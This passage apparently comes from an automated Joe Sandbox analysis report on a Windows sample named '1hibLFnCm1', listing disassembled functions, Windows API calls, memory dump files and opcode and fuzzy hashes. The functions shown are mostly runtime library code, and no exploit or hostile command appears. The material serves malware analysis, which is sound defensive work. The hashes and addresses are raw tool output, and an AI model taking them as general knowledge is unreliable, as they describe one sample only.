                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F7286C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$InfoLocale
                                                      • String ID:
                                                      • API String ID: 3736152602-0
                                                      • Opcode ID: f9554c9a162b7aa0cfe6439ae4f201797b3ce4f271cef93dde88d587cc0c9125
                                                      • Instruction ID: 3deef22f330a399e9b41fca266f1a2c01a196521b21e7f2639750dc47fd512e2
                                                      • Opcode Fuzzy Hash: f9554c9a162b7aa0cfe6439ae4f201797b3ce4f271cef93dde88d587cc0c9125
                                                      • Instruction Fuzzy Hash: 2F21C532A04106ABEB289B24DC41FBA73ACEF54320F10407BFD09D6145EB7ADD48EB52
                                                      Function 00F60E13 Relevance: 1.6, Strings: 1, Instructions: 314COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0
                                                      • API String ID: 0-4108050209
                                                      • Opcode ID: 363f142fb7806c48cbe288a349bf58cc079dfcfbe0e14001153e9d04412a9626
                                                      • Instruction ID: 7d4da6b4e9cdb219a17cac1cd58faf8741f0f3c7ec9a4f3827ba5fc56ec4f6db
                                                      • Opcode Fuzzy Hash: 363f142fb7806c48cbe288a349bf58cc079dfcfbe0e14001153e9d04412a9626
                                                      • Instruction Fuzzy Hash: 34B1F370D0065A9BCF34CE68C8A1ABFB7B5FF15324F280A1AE452D7291CB369941FB51
                                                      Function 00F7249F Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F691E1: GetLastError.KERNEL32(?,00000008,00F67C1C), ref: 00F691E5
                                                        • Part of subcall function 00F691E1: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00F69287
                                                      • EnumSystemLocalesW.KERNEL32(00F725C5,00000001,00000000,?,-00000050,?,00F72BF6,00000000,?,?,?,00000055,?), ref: 00F72511
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                      • String ID:
                                                      • API String ID: 2417226690-0
                                                      • Opcode ID: 860b5f2e60c2cfa8cf2efdab68b110ec96a13a9b85bc7aba57af295822a9316e
                                                      • Instruction ID: 586aba6ef528cecc73076ceb04284315126bf20fa3ae540107f46db4f164e4f6
                                                      • Opcode Fuzzy Hash: 860b5f2e60c2cfa8cf2efdab68b110ec96a13a9b85bc7aba57af295822a9316e
                                                      • Instruction Fuzzy Hash: 22114C376007015FDB189F38CCA157ABB91FF84328B18842DE98B47640D775B943DB40
                                                      Function 00F72A47 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F691E1: GetLastError.KERNEL32(?,00000008,00F67C1C), ref: 00F691E5
                                                        • Part of subcall function 00F691E1: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00F69287
                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00F727E1,00000000,00000000,?), ref: 00F72A73
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$InfoLocale
                                                      • String ID:
                                                      • API String ID: 3736152602-0
                                                      • Opcode ID: fe081cf2f1624891d90fca6a2b45f45030a01409874485435bb9a0f33b242264
                                                      • Instruction ID: 602f631550031705a7b4a32f2d840f0f4e57b02c2e10a7298913e61e5a91e547
                                                      • Opcode Fuzzy Hash: fe081cf2f1624891d90fca6a2b45f45030a01409874485435bb9a0f33b242264
                                                      • Instruction Fuzzy Hash: ADF0FE32A00116AFEB3857108C05FBA7778DF40364F158426EC09A3144DA78FE42D5D1
                                                      Function 00F723AD Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F691E1: GetLastError.KERNEL32(?,00000008,00F67C1C), ref: 00F691E5
                                                        • Part of subcall function 00F691E1: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00F69287
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00F72401
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$InfoLocale
                                                      • String ID: utf8
                                                      • API String ID: 3736152602-905460609
                                                      • Opcode ID: b924c2b88659f8a0906abbc4c5121bd42d01ff56f033aa0064415ad8580eb44a
                                                      • Instruction ID: be6355063f7bceee3ceaf393bec53aa4abb4985e54b6c084751ee689179bf43e
                                                      • Opcode Fuzzy Hash: b924c2b88659f8a0906abbc4c5121bd42d01ff56f033aa0064415ad8580eb44a
                                                      • Instruction Fuzzy Hash: 3CF02832B04105ABC714AF34DC49EBA33ECDB45310F20007AB906D7281EAB8AE04A791
                                                      Function 00F7253A Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F691E1: GetLastError.KERNEL32(?,00000008,00F67C1C), ref: 00F691E5
                                                        • Part of subcall function 00F691E1: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00F69287
                                                      • EnumSystemLocalesW.KERNEL32(00F72818,00000001,45F1B473,?,-00000050,?,00F72BBA,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00F72584
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                      • String ID:
                                                      • API String ID: 2417226690-0
                                                      • Opcode ID: 9fb771892b4c5b30b9be5a84c7fd7079a7b0f0ed968bad8195170d82071cf5e6
                                                      • Instruction ID: 2dd9990446f7ca3e23409ca69d4704cccf171e28a0ec0b887198390921b4f378
                                                      • Opcode Fuzzy Hash: 9fb771892b4c5b30b9be5a84c7fd7079a7b0f0ed968bad8195170d82071cf5e6
                                                      • Instruction Fuzzy Hash: D8F046367003041FDB249F399C91A7A7B95FF80328F19842EFA4A4B680C7B19D02EB01
                                                      Function 00F6821E Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F61F98: EnterCriticalSection.KERNEL32(?,?,00F66CC3,00000000,00F87F68,0000000C,00F66C8A,0000000C,?,00F681AD,0000000C,?,00F6937F,00000001,00000364,?), ref: 00F61FA7
                                                      • EnumSystemLocalesW.KERNEL32(00F68211,00000001,00F88028,0000000C,00F68640,00000000), ref: 00F68256
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                      • String ID:
                                                      • API String ID: 1272433827-0
                                                      • Opcode ID: e536351909250d2a58b3385f596f5114d904bf49d87d0338b9bd60cac26289ba
                                                      • Instruction ID: 1d6e12778ba4fff43183da7cdf2f5199020c8302fc734cf3bc3695ce855ea66f
                                                      • Opcode Fuzzy Hash: e536351909250d2a58b3385f596f5114d904bf49d87d0338b9bd60cac26289ba
                                                      • Instruction Fuzzy Hash: E1F03C76A44208EFDB00EF98DC42BAD77B0FB44721F10411AE814D72A1CBB95945AF41
                                                      Function 00F72454 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F691E1: GetLastError.KERNEL32(?,00000008,00F67C1C), ref: 00F691E5
                                                        • Part of subcall function 00F691E1: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00F69287
                                                      • EnumSystemLocalesW.KERNEL32(00F723AD,00000001,45F1B473,?,?,00F72C18,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00F7248B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                      • String ID:
                                                      • API String ID: 2417226690-0
                                                      • Opcode ID: ac21f0e2e8266eea6b6ee751b5deedd700012971f02fd14c016d7ca799f67759
                                                      • Instruction ID: 0d5dfdb9582c4c68bbfb5bf4a17c3c143a7cc5a7e4920760018b22b79bd7e699
                                                      • Opcode Fuzzy Hash: ac21f0e2e8266eea6b6ee751b5deedd700012971f02fd14c016d7ca799f67759
                                                      • Instruction Fuzzy Hash: CCF0E53670020957CB04DF39DC49A6A7FA4EFC1720F06805DFA0A8B251C675D942E751
                                                      Function 00F68744 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00F6682E,?,20001004,00000000,00000002,?,?,00F65E30), ref: 00F68778
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID:
                                                      • API String ID: 2299586839-0
                                                      • Opcode ID: 5442d699115a823181dc924056c7ebc9bbc09e09157d57886a7f171d794d2c49
                                                      • Instruction ID: 0f23d6ebd9b786248b5d1512d4c87c12f5fa922b36c53e4734eb8ee2ebef23cc
                                                      • Opcode Fuzzy Hash: 5442d699115a823181dc924056c7ebc9bbc09e09157d57886a7f171d794d2c49
                                                      • Instruction Fuzzy Hash: 39E04F3250011CBBDF122F61DD05E9E7E16EF44BA0F114124FD0966260CF768962BBD6
                                                      Function 00F5BAF3 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0000BAFF,00F5AE57), ref: 00F5BAF8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: 200ecc82e541657bdbc005bfacf1304dd8f8953271fe9434dc8d9e6e25bc22ad
                                                      • Instruction ID: 37673ef7ae0a674a9b3419e4143442ff58a197c40e6c266f7a61b44275be831c
                                                      • Opcode Fuzzy Hash: 200ecc82e541657bdbc005bfacf1304dd8f8953271fe9434dc8d9e6e25bc22ad
                                                      • Instruction Fuzzy Hash:
                                                      Function 00F72D78 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: HeapProcess
                                                      • String ID:
                                                      • API String ID: 54951025-0
                                                      • Opcode ID: 0a646dd30670ae841f3d9123456d606a9ce1bd5e27727d8516a9b88f2e9b6871
                                                      • Instruction ID: 6b4bb9df5e527bd488d8f61b3216456b26b7f9243eae5e791c56e521e541f548
                                                      • Opcode Fuzzy Hash: 0a646dd30670ae841f3d9123456d606a9ce1bd5e27727d8516a9b88f2e9b6871
                                                      • Instruction Fuzzy Hash: 5EA02430101304CF5300CF315F0430C35D4774D5D074140145004CC130D7304040FF03
                                                      Function 00F6DAB9 Relevance: .6, Instructions: 637COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2824bad8496b806e30e164cab001e9fa16808933ada556bbb01a4139e2dec626
                                                      • Instruction ID: 30654baf036f9c309aae4a4542d5526e55949296afe42003ced27716d0dfb23c
                                                      • Opcode Fuzzy Hash: 2824bad8496b806e30e164cab001e9fa16808933ada556bbb01a4139e2dec626
                                                      • Instruction Fuzzy Hash: 0C320222D29F054DD7639634DC22336A68DAFB73D4F15C727F81AB59AAEB2884C36101
                                                      Function 00F6CEEC Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86fcdfd1c4b803da11d3519fcd0678c6e5ffec2fe946b7f0659319e6c8cff2ad
                                                      • Instruction ID: f92b773454f82d63a633902a66b9f2c40b3c28a432f15ea444aa670e48f0440a
                                                      • Opcode Fuzzy Hash: 86fcdfd1c4b803da11d3519fcd0678c6e5ffec2fe946b7f0659319e6c8cff2ad
                                                      • Instruction Fuzzy Hash: 75E08C72A11238EBCB14DB88C94499AF3FCEB48FA0B15009AB541D3100C274DE00D7E0
                                                      Function 00F6528D Relevance: .0, Instructions: 12COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7670a5439429275f47a7269192a066cd67782bff548d39fcf9cbb0160484796f
                                                      • Instruction ID: 40794692950a67f70578b685c2d0ff07ccd176496d44720626b5ffc56b36247f
                                                      • Opcode Fuzzy Hash: 7670a5439429275f47a7269192a066cd67782bff548d39fcf9cbb0160484796f
                                                      • Instruction Fuzzy Hash: 8BC08C38510D0046CF29999082713B83368A3E1FD2F80048CD8426B642C61E9C82F600
                                                      Function 00F5B025 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(00F8B564,00000FA0,?,?,00F5B003), ref: 00F5B031
                                                      • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00F5B003), ref: 00F5B03C
                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00F5B003), ref: 00F5B04D
                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00F5B05F
                                                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00F5B06D
                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00F5B003), ref: 00F5B090
                                                      • DeleteCriticalSection.KERNEL32(00F8B564,00000007,?,?,00F5B003), ref: 00F5B0AC
                                                      • CloseHandle.KERNEL32(00000000,?,?,00F5B003), ref: 00F5B0BC
                                                      Strings
                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00F5B037
                                                      • kernel32.dll, xrefs: 00F5B048
                                                      • SleepConditionVariableCS, xrefs: 00F5B059
                                                      • WakeAllConditionVariable, xrefs: 00F5B065
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
